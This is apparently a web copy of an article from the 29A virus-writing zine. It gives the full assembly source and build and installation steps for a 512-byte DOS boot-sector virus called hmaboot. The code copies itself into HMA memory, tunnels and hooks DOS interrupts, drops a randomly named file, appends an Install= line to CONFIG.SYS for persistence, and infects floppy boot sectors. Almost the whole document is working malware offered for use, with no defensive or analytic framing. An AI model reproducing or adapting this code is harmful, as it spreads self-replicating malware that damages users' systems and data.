Copy Link
Add to Bookmark
Report
29A Issue 02 04 08
comment *
Designed by "Q" the Misanthrope
This virus uses HMA memory extensively. It boots directly into the HMA by the
brute force method. It then waits till DOS loads then creates a random file
and adds an Install= statement to the CONFIG.SYS that loads the virus again
into the HMA (not bad for 512 bytes.) Also works with Windoze 95.
tasm hmaboot /m2
tlink hmaboot
exe2bin hmaboot.exe hmaboot.com
format a:/q/u
debug hmaboot.com
l 300 0 0 1
w 100 0 0 1
w 300 0 20 1
m 11e,2ff 100
w
q
copy hmaboot.com c:\BBFNJACD
edit c:\config.sys
Install=\BBFNJACD
altf
x
y
*
.286
qseg segment byte public 'CODE'
assume cs:qseg,es:qseg,ss:nothing,ds:qseg
top: jmp short hma_install
db 90h
db "MSDOS5.0"
dw 512
db 1
dw 1
db 2
dw 224
dw 2880
db 0F0h
dw 9
dw 18
dw 2
org 001eh
com_install proc near
mov ax,3501h ;tunnel to interrupt 21h
int 21h
mov dx,offset interrupt_1-com_install+100h
mov ah,25h ;set our interrupt 1 routine
push es
int 21h
pop ds ;set ds:dx to set int 1 back
push 00h ;es=00h
pop es
pushf ;simulate interrupt stack
mov dx,bx
push cs ;simulate stack to return to
push es ;cs:00h that terminates virus
int 01h ;set interrupt trap bit
jmp dword ptr es:[21h*04h] ;simulate int 21 and trace it
com_install endp
hma_install proc near ;brute force HMA access @ boot
pusha
mov al,0d1h ;for 8042 keyboard controller
out 64h,al
reloop: in al,64h
and al,02h
jnz reloop
mov al,0e3h ;enable HMA
out 60h,al
popa
es_si equ $+01h ;trick to get es:si point HMA
make_hma: mov bx,7c00h ;for reading boot sector
push cs ;becomes fc0eh for es
cld
pop ds ;load es:si=fc0e:7c00 in HMA
les si,dword ptr ds:[bx+offset es_si-top]
mov cx,offset previous_hook ;loop counter
lea di,word ptr ds:[si] ;source is 0000:7c00
push cs
push bx
push si
rep movsb ;move it to HMA
pop si
mov cl,low((offset previous_hook-top)/2)
rep movsw ;copy it again to HMA
mov si,1ah*04h ;hook interrupt 1ah
push si
push es
mov ax,offset interrupt_1a+7e00h-02h
call hook_interrupt ;hook interrupt into HMA
mov es,cx ;es=0 cx=low mem kernal length
mov cl,low(offset make_hma-hma_install)
mov di,0201h ;for low mem stub and int 13
push di
mov si,offset hma_install+7c00h
rep movsb ;HMA enable stub to low mem
mov al,0eah ;far jump
stosb
pop ax ;ax=0201 for int 13 read
pop si ;point it 1a to stub
push cs ;for far call return
call hook_interrupt ;set int 1a to point to stub
hma_install endp
set_cx_dx proc near ;read original bootsector
mov si,word ptr ds:[bx+11h] ;from last sector of root
shr si,04h ;directory
mov cx,word ptr ds:[bx+16h]
shl cx,01h
add cx,si
mov dh,01h
inc cx
sub cx,word ptr ds:[bx+18h]
int 13h ;read it and then jump to it
retf
set_cx_dx endp
config_line db "C:\Config.Sys",00 ;what to infect
install_name db "Install=" ;what to add
file_name db "\",00h ;random file goes here
crlf equ $+07h ;a carrage return line feed
interrupt_1 proc near ;tunnel routine to hook int 21
pusha
push sp
pop bp
push ds
push es
lds bx,dword ptr ss:[bp+10h];get instruction
cmp word ptr ds:[bx+01h],02effh
jne go_back ;was it a far indexed jump
cmp byte ptr ds:[bx-0ah],6ah
je toggle_tf ;was it our code
mov si,word ptr ds:[bx+03h] ;get index of jump
cmp byte ptr ds:[si+03h],0f0h
jb go_back ;was it in the HMA
mov bh,high(((tail-com_install+10h)SHR 4)*10h)+01h
mov di,0ffffh ;if so then allocate HMA
mov ax,4a02h ;to load virus into
int 2fh
inc di ;di=0 if no HMA
jz toggle_tf
push si ;save location of int 21 chain
cld
mov cx,previous_hook-com_install
mov si,0100h ;copy virus to HMA
rep movs byte ptr es:[di],cs:[si]
pop si ;hook into int 21 chain
lea ax,word ptr ds:[di-(offset previous_hook-resident_21)]
push cs ;for far call
call hook_interrupt ;hook in
toggle_tf: xor byte ptr ss:[bp+15h],01h;toggle single step flag
go_back: pop es
pop ds
popa ;pop all varables
iret ;return
interrupt_1 endp
hook_interrupt proc near ;hook interrupt
movsw ;move ds:si to es:di
movsw ;4 bytes worth
mov word ptr ds:[si-04h],ax ;hook into ds:si es:ax
mov word ptr ds:[si-02h],es
retf ;return far
hook_interrupt endp
interrupt_21 proc near ;momentary int 21 routine
pushf
pusha
push ds
push es
push cs
pop ds
mov ax,3d42h ;open config.sys
mov dx,offset config_line+7e00h-02h
int 18h
mov bx,5700h ;get date
xchg ax,bx
jc retry_later ;jump if error
int 18h
jcxz close_it ;check if infected
inc ax ;for set date later
pusha ;save it
mov ah,48h ;allocate lower memory for
mov bx,0888h ;disk write to config.sys
mov cx,bx
int 18h
jc popa_close_it
mov es,ax ;new segment to copy virii to
mov dx,offset file_name+7e00h-02h
mov di,dx ;ds:dx points to virii name
lea si,word ptr ds:[di]
std
rep movsw ;move the virus to low mem
push es
pop ds
mov ah,5ah ;create random file
int 18h
mov dx,offset com_install+7c00h
mov bh,40h ;now write it
xchg ax,bx
mov ch,02h ;at least 512 bytes worth
int 18h
mov ah,3eh ;close it
int 18h
popa ;get handle of config.sys
pusha ;push it again
mov ax,4202h ;goto the end of config.sys
cwd
push dx
pop cx
int 18h
mov ah,40h ;write install= line and crlf
mov word ptr ds:[crlf+7e00h-02h],0a0dh
mov cl,low(crlf-install_name+02h)
mov dx,offset install_name+7e00h-02h
int 18h ;add line to config.sys
mov ah,49h ;deallocate memory
int 18h
popa_close_it: popa ;get file date
sub cx,cx ;mark that it is infected
int 18h
close_it: mov ah,3eh ;close config.sys
int 18h
set_21_back: lds dx,dword ptr ds:[previous_hook+7c00h]
jmp short set_int_21 ;unkook int 21
retry_later: jmp short jmp_pop_it
interrupt_21 endp
interrupt_1a proc near ;interrupt 1a hook at startup
pushf
pusha
mov ax,1200h ;dos loaded yet?
push ds
push es
cwd
int 2fh
inc al
jnz jmp_pop_it
mov ds,dx ;if so then unhook int 1a and
mov si,21h*04h ;hook int 21 and set int 18
mov di,offset previous_hook+7c00h
les bx,dword ptr cs:[previous_hook+7e00h-02h]
mov ds:[si-((21h-1ah)*04h)],bx
mov ds:[si-((21h-1ah)*04h)+02h],es
les bx,dword ptr ds:[si]
mov ds:[si-((21h-18h)*04h)+02h],es
mov ds:[si-((21h-18h)*04h)],bx
push cs
cld
pop es
movsw
movsw ;hook in int 21
mov dx,offset interrupt_21+7c00h
push cs
pop ds
set_int_21: mov ax,2521h ;set int 21
int 18h
jmp_pop_it: jmp short pop_it
interrupt_1a endp
org 001aeh
resident_21 proc near ;resident int 21 routine
pushf
pusha
push ds
push es
cmp ah,38h ;infect on get country code
jne pop_it
mov ah,19h ;see if drive a:
pushf
push cs
call far_jmp
or al,al
jnz pop_it ;if not then don't infect
call next_line ;get offset in HMA
next_line: pop bx
add bx,offset vbuffer-next_line
push cs
mov cx,0001h ;read boot sector
pop es
push cs
mov ax,0201h
cwd
pop ds
int 13h
jc pop_it ;any errors then leave
mov di,0000h ;move di the jmp instruction
org $-02h ;at the start of the virii
jmp $(hma_install-top)
cmp di,word ptr ds:[bx] ;check if it is infected
je pop_it ;if so then leave
mov ax,0301h ;move old boot sector
pusha
push cs ;for far call
call set_cx_dx ;write old boot sector
xchg di,word ptr ds:[bx] ;put jmp in boot sector
cld ;copy virii to boot sector
mov cx,previous_hook-com_install
lea si,word ptr ds:[bx-offset (vbuffer-com_install)]
lea di,word ptr ds:[bx+com_install-top]
rep movsb
popa ;write virus
int 13h
pop_it: pop es ;clean the stack
pop ds
popa
popf
resident_21 endp
org 001fdh
far_jmp proc near
db 0eah ;jump to previous hook
previous_hook: label double
far_jmp endp
boot_signature dw 0aa55h ;boot sector thingy
org $+02h
vbuffer label byte ;where the reads/writes are
org $+0202h
tail label byte ;the end
qseg ends
end
